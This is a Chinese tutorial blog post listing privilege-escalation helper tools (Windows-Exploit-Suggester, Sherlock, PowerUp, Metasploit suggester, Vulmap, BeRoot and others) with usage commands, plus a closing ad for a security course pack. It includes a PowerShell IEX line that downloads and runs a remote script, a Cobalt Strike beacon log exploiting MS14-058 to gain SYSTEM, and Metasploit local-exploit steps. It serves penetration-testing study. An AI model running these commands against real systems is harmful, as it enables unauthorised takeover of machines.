干货 | 常用提权辅助工具推荐
一、使用Windows-Exploit-Suggester解析systeminfo
1、简介
Windows-Exploit-Suggester是受Linux_Exploit_Suggester的启发而开发的一款提权辅助工具,用python开发而成,通过比对systeminfo生成的文件,从而发现系统是否存在未修复漏洞。
2、下载地址:
https://github.com/AonCyberLabs/Windows-Exploit-Suggester3、使用方式:
1.安装xlrd包(注意python2、3版本的pip问题)
使用python2 的pip来安装xlrd包 命令:
python2 -m pip install xlrd==1.2.0安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:
最近xlrd更新到了2.0.1版本,只支持.xls文件。
所以pandas.read_excel(‘xxx.xlsx’)会报错。
2.获取对应的漏洞信息库(注意要使用python2来获取)
python2 windows-exploit-suggester.py --update成功后会生成一个xls表格文件
3.生成要进行对比的靶机的系统信息
systeminfo > systeminfo_win10.txt在对应的靶机上运行该命令把靶机安装不到情况写入systeminfo_win10.txt文件中
4.使用windows-exploit-suggester.py来进行对比
python2 windows-exploit-suggester.py --database 2023-03-07-mssb.xls --systeminfo systeminfo_win10.txt二、使用Linux-Exploit-Suggester.sh寻找linux提权问题
1、简介
Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具
2、下载地址:
https://github.com/mzet-/linux-exploit-suggester3、使用方式:
./linux-exploit-suggester.sh三、使用Sherlock工具
1、简介
Sherlock是一个在Windows下用于本地提权的PowerShell脚本。
目前包含了以下漏洞:
MS10-015 : User Mode to Ring (KiTrap0D) MS10-092 : Task Scheduler MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow MS13-081 : TrackPopupMenuEx Win32k NULL Page MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference MS15-051 : ClientCopyImage Win32k MS15-078 : Font Driver Buffer Overflow MS16-016 : ‘mrxdav.sys’ WebDAV MS16-032 : Secondary Logon Handle2、下载地址:
https://github.com/rasta-mouse/Sherlock3、使用方式:
1.加载脚本
本地加载脚本
Import-Module Sherlock.ps1远程加载脚本
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')2.发现漏洞
Find-AllVulnsAppears Vulnerable就是存在漏洞
3.验证漏洞
elevate ms14-058 smb4、使用实例:
beacon> getuid [*] Tasked beacon to get userid [+] host called home, sent: 20 bytes [*] You are Win7-x64\Rasta beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1 [*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1 [+] host called home, sent: 2960 bytes beacon> powershell Find-MS14058 [*] Tasked beacon to run: Find-MS14058 [+] host called home, sent: 20 bytes [+] received output: Title : TrackPopupMenu Win32k Null Pointer Dereference MSBulletin : MS14-058 CVEID : 2014-4113 Link : https://www.exploit-db.com/exploits/35101/ VulnStatus : Appears Vulnerable beacon> elevate ms14-058 smb [*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337) [+] host called home, sent: 105015 bytes [+] received output: [*] Getting Windows version... [*] Solving symbols... [*] Requesting Kernel loaded modules... [*] pZwQuerySystemInformation required length 51216 [*] Parsing SYSTEM_INFO... [*] 173 Kernel modules found [*] Checking module \SystemRoot\system32\ntoskrnl.exe [*] Good! nt found as ntoskrnl.exe at 0x0264f000 [*] ntoskrnl.exe loaded in userspace at: 40000000 [*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC [*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0 [*] Registering class... [*] Creating window... [*] Allocating null page... [*] Getting PtiCurrent... [*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0 [*] Creating a fake structure at NULL... [*] Triggering vulnerability... [!] Executing payload... [+] host called home, sent: 204885 bytes [+] established link to child beacon: 192.168.56.105 beacon> getuid [*] Tasked beacon to get userid [+] host called home, sent: 8 bytes [*] You are NT AUTHORITY\SYSTEM (admin)四、使用MSF查询补丁和可利用提权漏洞
1、查询补丁
meterpreter> run post/windows/gather/enum_patches [+] KB2999226 installed on 11/25/2020 [+] KB976902 installed on 11/21/20102、查询Exp
msf> use post/multi/recon/local_exploit_suggester msf> set LHOST <攻击机IP> msf> set SESSION msf> run3、利用示例
msf> use exploit/windows/local/cve_2019_1458_wizardopium msf> set SESSION msf> run meterpreter> getuid Server username: NT AUTHORITY\SYSTEM五、使用powerup检查提权漏洞
1、简介
PowerUp 所做的事是寻找可能存在弱点的地方,从而帮助提权。 利用 PowerUp 进行提权需要首先导入 ps1 文件powershell-import PowerUp.ps1,再执行powershell Invoke-AllChecks命令,使用 PowerUp 脚本可以快速的帮助我们发现系统弱点,从而实现提权的目的。
2、下载地址
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc3、使用方式
执行以下命令:将 ps1 文件上传到目标主机,并执行所有弱点检查。
powershell-import PowerUp.ps1 powershell invoke-allchecks4、注意
1、如果在自己的靶机上发现导入ps1文件失败,这可能是因为系统不允许执行不信任的脚本文件导致的。 这时为了复现成功可以来到靶机下,以管理员权限打开 Powershell,运行set-ExecutionPolicy RemoteSigned,输入Y回车,此时系统便能导入PowerUp.ps1文件了。 如果是真实环境执行不了那就只能换工具了。 2、在运行Invoke-AllChecks后,便会列出当前系统中可被提权的弱点之处,之后再执行检查结果中AbuseFunction下的命令便能开始提权操作了。
六、accesschk.exe
1、简介
AccessChk是微软提供的一款安全检查工具,是Sysintenals集合中的一款工具,使用它可以对Windows系统中的一些系统文件、服务、注册表等进行管理和维护排查等功能,可以很直观清晰的发现系统资源存在的缺陷,对其进行提权等,所以往往会被攻击者利用。
2、下载地址
英文版本:
http://technet.microsoft.com/en-us/sysinternals/bb664922中文版本:
http://technet.microsoft.com/ZH-cn/sysinternals/bb6649223、使用方式
1.AccessChk常用参数:
-c Name是服务名称,如spooler -d 仅处理目录,或最高级的 -k Name是注册表项 -n 仅显示没有访问权限的对象 -p Name是进程或进程PID,例如svchost.exe -r 仅显示具有读取访问权限的对象 -s 递归 -v 显示详细信息 -w 仅显示具有写入访问权限的对象2.常用语句
查看所有用户在d盘dir路径的子路径的权限 accesschk "d:\dir" 查看Administrator用户在d盘dir路径的子路径的权限 accesschk "Administrator "d:\dir" 查看Administrators组对所有服务的权限 accesschk Administrators -c * 查看Guest用户对hklm\software注册表的权限 accesschk -k Guest hklm\software 查看User用户对全局对象的权限 accesschk -ou User3.详细使用方式
https://learn.microsoft.com/zh-cn/sysinternals/downloads/accesschk七、WindowsVulnScan
查找主机上具有的CVE,查找具有公开EXP的CVE的Python脚本
1、简介
WindowsVulnScan是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误,采用md5哈希算法确保数据不重复插入。 本工具查找是否有公开exp的网站为shodan,该网站限制网络发包的速度,因而采用了单线程的方式,且耗时较长。
2、下载地址:
https://github.com/chroblert/WindowsVulnScan3、使用方式
1.参数介绍
可选参数: -h, --help show this help message and exit -u, --update-cve 更新CVEKB数据 -U, --update-exp 更新CVEEXP数据 -m MODE, --mode MODE 搭配-U使用。更新模式 All:更新所有;Empty:只更新空白的;Error:只更新之前未成功更新的 -C, --check-EXP 检索具有EXP的CVE -n PRODUCTNAME, --productName PRODUCTNAME 搭配-C使用。自定义产品名称,如Windows 10 -N PRODUCTVERSION, --productVersion PRODUCTVERSION 搭配-C使用。自定义产品版本,如20H2 -f FILE, --file FILE ps1脚本运行后产生的.json文件2.使用方式
1. 首先运行powershell脚本KBCollect.ps收集一些信息 .\KBCollect.ps1 2. 将运行后产生的KB.json文件移动到cve-check.py所在的目录 3. 安装一些python3模块 python3 -m pip install requirements.txt 4. 运行cve-check.py -u创建CVEKB数据库 5. 运行cve-check.py -U更新CVEKB数据库中的hasPOC字段 cve-check.py -u 此处可以使用-m选择更新模式。 -m All:更新所有 -m Empty:只更新hasPOC字段为空的 -m Error:只更新hasPOC字段为Error的 6. 运行cve-check.py -C -f KB.json查看具有公开EXP的CVE,如下: cve-check.py -C -f KB.json 7. 若使用脚本扫描到的系统名称和版本不准确,可以使用-n,-N进行指定八、gtfo
1、简介
特征。该工具的唯一功能是让您能够从终端中搜索gtfobins和lolbas。 GTFOBins:Linux命令提权辅助查询
https://gtfobins.github.io/LOLBAS:Windows命令提权辅助查询
https://lolbas-project.github.io/2、下载地址
https://github.com/mzfr/gtfo3、使用方式
https://github.com/mzfr/gtfo九、Vulmap
1、简介
Vulmap是一款漏洞扫描工具, 可对Web容器、Web服务器、Web中间件以及CMS等Web程序进行漏洞扫描, 并且具备漏洞利用功能。 相关测试人员可以使用vulmap检测目标是否存在特定漏洞, 并且可以使用漏洞利用功能验证漏洞是否真实存在。
2、下载地址
https://github.com/vulmon/Vulmap安装依赖:
pip3 install -r requirements.txt3、使用方式
测试所有漏洞poc python3 vulmap.py -u http://testphp.vulnweb.com RCE漏洞使用id命令 python3 vulmap.py -u http://example.com -c "id" 指定web容器 -a参数 python3 vulmap.py -u http://example.com -a struts2 指定模式 -m参数 python3 vulmap.py -u http://example.com -m poc -a struts2 指定漏洞 -v参数 python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729 批量扫描URL -f参数 python3 vulmap.py -f scan_list.txt 导出扫描结果 -o参数 python3 vulmap.py -u http://example.com -o result.txt 详细使用可参考: https://blog.csdn.net/qq_45924653/article/details/109022892十、BeRoot
1、简介
BeRoot是一个后期开发工具,用于检查常见的Windows的配置错误,以方便找到提高我们提权的方法。其二进制编译地址为:
https://github.com/AlessandroZ/BeRoot/releases它将作为后开发模块被添加到pupy(Pupy是一个开源,跨平台(Windows,Linux,OSX,Android),多功能RAT远程管理工具和后开发工具,主要用python编写)项目中(因此它将在内存中执行,而不会在硬盘中执行)。 需要注意的是,这款工具只能用来检测,而无法直接利用目标系统中存在的漏洞。但是,如果它发现了错误配置,它可以通过模版来利用这些漏洞。模版文件位于templates/service目录下,如果项目提供的模版文件无法运行,我们也可以根据目标系统的情况手动创建一个模版文件。
2、下载地址
https://github.com/AlessandroZ/BeRoot3、使用方式
https://www.cnblogs.com/backlion/p/7325144.html十一、在线提权漏洞检测平台
极光无限出品的安全扫描仪,在提权方面,基于其强大的安全检测能力,能够给出专业的修复建议,有效验证和加固网络资产漏洞。 查询地址:
https://detect.secwx.com/学习资源
如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你
知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。
读者福利 |CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
一、知识库价值
深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。
实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
二、部分核心内容展示
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。
1、网络安全意识
2、Linux操作系统
3、WEB架构基础与HTTP协议
4、Web渗透测试
5、渗透测试案例分享
6、渗透测试实战技巧
7、攻防对战实战
8、CTF之MISC实战讲解
三、适合学习的人群
基础适配人群
- 零基础转型者:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链;
- 开发/运维人员:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展或者转行就业;
- 应届毕业生:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期;
能力提升适配
1、技术爱好者:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者;
2、安全从业者:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力;
3、合规需求者:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
文章来自网上,侵权请联系博主